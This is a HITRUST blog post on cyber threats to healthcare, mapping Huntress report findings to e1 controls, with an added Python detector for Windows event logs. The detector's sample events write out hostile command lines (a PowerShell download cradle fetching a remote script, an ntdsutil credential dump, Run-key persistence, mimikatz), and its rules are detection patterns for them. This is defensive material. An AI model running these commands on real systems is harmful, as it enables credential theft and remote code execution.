Cybersecurity Best Practices and Risk Management Blog | HITRUST

Healthcare Under Attack: How HITRUST e1 Defends Against Modern Cyber Threats

Written by HITRUST | Nov 20, 2025 4:00:02 PM

Takeaways

  • Healthcare remains a top target for cyberattacks: Cybercriminals are intensifying attacks against healthcare organizations due to valuable patient data and outdated systems.
  • Vendors are the new attack vector: Even the most secure organizations can be compromised through a trusted third party.
  • HITRUST e1 provides proven protection: The HITRUST e1 offers a pragmatic, standardized way to verify that both organizations and their vendors have implemented critical cybersecurity controls to prevent, detect, and respond to today’s most prevalent threats.

Overview

The Huntress 2025 Cyber Threat Report analyzes attacks observed in 2024, showing that cybercriminals are repurposing sophisticated techniques against small and mid‑sized organizations. Healthcare was hit particularly hard because it holds valuable patient data and often relies on outdated systems. Threat actors frequently used malicious scripts, remote access Trojans (RATs), remote‑monitoring tool abuse, and ransomware. These patterns highlight the need for comprehensive security measures across the entire supply chain. One major risk associated with these attacks is that the threat actor may compromise enterprise systems via a third party. For example, any one of your hundreds of software providers may itself be compromised by these attacks and used as a stepping stone into its customers’ environments, including yours.

Key threats and relevant e1 controls

Malicious scripts and fileless malware

  • What Huntress saw: Malicious script executions were the most common attack vector in healthcare. Attackers used PowerShell or JavaScript to persist on hosts, modify the Windows Registry, or download additional malware.
  • e1 controls: Deploy endpoint protection tools that can detect and block script‑based attacks and fileless malware. Enforce default‑deny rules on host‑based firewalls to prevent unauthorized outbound connections. Keep systems patched and configurations hardened to reduce exploitable vulnerabilities. Prohibit installation of unauthorized software and disable auto‑run features to limit untrusted code execution. Perform regular vulnerability scans and implement an incident response plan to catch and remediate malicious activity quickly.

Infostealers and credential harvesting

  • What Huntress saw: Infostealers targeted healthcare to extract PHI and credentials. More than 38% of hands‑on‑keyboard activity involved network or domain reconnaissance, and attackers used tools such as Mimikatz to dump cached credentials.
  • e1 controls: Enforce strong password policies and change default credentials on all systems. Require multi‑factor authentication for privileged accounts and remote access to limit the impact of stolen passwords. Review account privileges regularly, limit administrative rights, and use separate accounts for administrative duties. Enable comprehensive logging and protect audit trails to support investigation of credential misuse. Provide ongoing security awareness and phishing‑resistance training so staff recognize and report credential‑stealing attempts.

Ransomware, data theft, and extortion

  • What Huntress saw: Ransomware in healthcare shifted toward data theft and extortion. Attackers combined data exfiltration with encryption to coerce victims, and the rise in cryptocurrency prices emboldened them.
  • e1 controls: Maintain offline or immutable backups and test restoration procedures regularly. Establish a robust incident response capability that includes detection, containment, and recovery. Limit access to sensitive data to authorized personnel and encrypt data on mobile devices. Use email and web‑filtering technologies to block phishing emails and connections to known malicious domains.

Remote Access Trojans (RATs) and RMM abuse

  • What Huntress saw: Attackers deployed Java‑based RATs (such as JRat and Adwind) and abused legitimate remote monitoring tools.
  • e1 controls: Secure remote access with multi‑factor authentication and restrict the use of remote administration tools to authorized solutions. Segment networks with firewalls to separate internal systems from external networks and limit lateral movement. Maintain an accurate inventory of IT assets and forbid installation of unauthorized software, including unauthorized RMM tools. Configure devices to log off idle sessions automatically and assign unique user accounts to all personnel.

Lateral movement and network enumeration

  • What Huntress saw: Attackers spent significant time mapping networks and domains. They used tools such as ntdsutil and diskshadow to dump credentials and move laterally, often exploiting legacy systems.
  • e1 controls: Apply least‑privilege principles; only authorized individuals should have administrative rights, and privileged activities should be logged and reviewed. Use network segmentation and host‑based firewalls to restrict inter‑segment traffic and make lateral movement more difficult. Perform regular asset inventories and vulnerability scans to identify legacy systems and misconfigurations. Enforce change‑control procedures and maintain baseline configurations to prevent unauthorized changes. Collect and retain audit logs so lateral movement can be detected and investigated.
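The logging and review controls in the malicious‑scripts, infostealer, and lateral‑movement bullets above only pay off if someone actually looks at the collected events. The following added example (written for this post; it is not HITRUST or Huntress code) shows what that review can look like in practice: a small detector that scans Windows process‑creation records (Event ID 4688) and PowerShell script‑block records (Event ID 4104) for the behaviours named above (hidden or encoded PowerShell, download cradles, Run‑key persistence, ntdsutil/diskshadow credential dumping, Mimikatz) and then picks the hosts that should be triaged first. The field names, host and user names, sample command lines and detection patterns are all constructed for illustration; production detection should use maintained, tested rule sets (Sigma, EDR content) rather than these narrow regular expressions.

```python
"""Added example (not from the HITRUST post or the Huntress report): scan
Windows 4688 / 4104 records for script abuse, registry persistence and
credential-dump tooling, then rank hosts for triage. Everything below
(field names, hosts, users, command lines, patterns) is constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry, already normalised to dicts (as a SIEM export might be).
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "WS-07", "user": "CLINIC\\nurse1",
     "command_line": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA..."},
    {"event_id": 4104, "host": "WS-07", "user": "CLINIC\\nurse1",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')"},
    {"event_id": 4688, "host": "DC-01", "user": "CLINIC\\svc-backup",
     "command_line": "ntdsutil.exe \"ac i ntds\" ifm \"create full C:\\Temp\\out\" q q"},
    {"event_id": 4688, "host": "DC-01", "user": "CLINIC\\svc-backup",
     "command_line": "diskshadow.exe /s C:\\Temp\\ds.txt"},
    {"event_id": 4688, "host": "WS-12", "user": "CLINIC\\admin-jdoe",
     "command_line": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /t REG_SZ /d C:\\Users\\Public\\u.vbs"},
    {"event_id": 4688, "host": "WS-09", "user": "CLINIC\\admin-jdoe",
     "command_line": "mimikatz.exe sekurlsa::logonpasswords"},
    {"event_id": 4688, "host": "WS-03", "user": "CLINIC\\reception",
     "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n"},
]

# Illustrative rules: (name, severity, pattern applied to the command line or script block).
RULES = [
    ("powershell_encoded_or_hidden", "medium",
     re.compile(r"(?:^|\s)-(?:enc(?:odedcommand)?|w(?:indowstyle)?\s+hidden|nop(?:rofile)?)\b", re.I)),
    ("powershell_download_cradle", "high",
     re.compile(r"\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"
                r"|\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b.*\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("registry_run_key_persistence", "high",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run(?:Once)?\b", re.I)),
    ("ntds_dump_via_ntdsutil", "critical",
     re.compile(r"\bntdsutil(?:\.exe)?\b.*\bifm\b", re.I)),
    ("vss_snapshot_via_diskshadow", "high",
     re.compile(r"\bdiskshadow(?:\.exe)?\b", re.I)),
    ("mimikatz_credential_dump", "critical",
     re.compile(r"\bmimikatz\b|\bsekurlsa::", re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    host: str
    user: str
    evidence: str  # truncated command line / script block that fired the rule


def scan_event(event: dict) -> list[Finding]:
    """Apply every rule to the command line (4688) or script block (4104) of one event."""
    text = event.get("command_line") or event.get("script_block") or ""
    return [
        Finding(name, severity, event["host"], event["user"], text[:120])
        for name, severity, pattern in RULES
        if pattern.search(text)
    ]


def scan_events(events) -> list[Finding]:
    """Flatten the findings across a batch of events."""
    return [finding for event in events for finding in scan_event(event)]


def hosts_needing_triage(findings, min_distinct_rules: int = 2) -> dict[str, list[str]]:
    """Hosts with any critical finding, or with several *different* rules firing:
    one host tripping unrelated rules is the hands-on-keyboard pattern the report
    describes (reconnaissance, then persistence, then credential access)."""
    rules_by_host: dict[str, set[str]] = defaultdict(set)
    critical_hosts: set[str] = set()
    for f in findings:
        rules_by_host[f.host].add(f.rule)
        if f.severity == "critical":
            critical_hosts.add(f.host)
    return {host: sorted(rules) for host, rules in rules_by_host.items()
            if host in critical_hosts or len(rules) >= min_distinct_rules}


if __name__ == "__main__":
    results = scan_events(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.severity:8}] {f.host:6} {f.user:18} {f.rule}: {f.evidence}")
    print("triage first:", hosts_needing_triage(results))
```

Two points worth noting about the inputs this relies on. Event ID 4688 records only carry a command line when the audit policy that includes the command line in process‑creation events is turned on, and Event ID 4104 only exists when PowerShell script block logging is enabled; both are part of the "comprehensive logging" the e1 controls call for, and without them the download cradle and the encoded‑command launch above would be invisible. The triage step is deliberately separate from the matching step so that a single noisy rule (the hidden‑window PowerShell pattern fires on some legitimate admin tooling) is not enough on its own to page someone, while a single credential‑dump hit is.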

Why vendor compliance with e1 requirements matters

The Huntress report shows that attackers exploit weaknesses not just in their primary targets but also in connected systems. Vendors often have direct network access or handle sensitive data on behalf of clients. If a vendor neglects patching, uses weak credentials, or does not enforce multi‑factor authentication, it can become the entry point for the same malicious scripts, infostealers, or remote‑access abuse described above.

Requiring vendors to adhere to the e1 requirements offers assurance that they implement comprehensive controls across governance, technical, and operational domains. These controls include endpoint security, firewalls, strong authentication, least‑privilege access, incident response, and employee training. Mandating an e1 certification in vendor contracts reduces third‑party risk, demonstrates due diligence, and aligns the entire ecosystem to best practices.

Conclusion

The 2025 Huntress report underscores the evolving threats facing healthcare organizations, from malicious scripts and infostealers to ransomware and lateral movement. The e1 requirements provide a structured set of practices that collectively mitigate these threats by addressing technical vulnerabilities, human factors, and incident response readiness. Organizations should not only implement these controls internally but also require their vendors to meet them. Doing so builds a resilient defense that protects patient data and ensures continuity of care in the face of an increasingly aggressive threat landscape.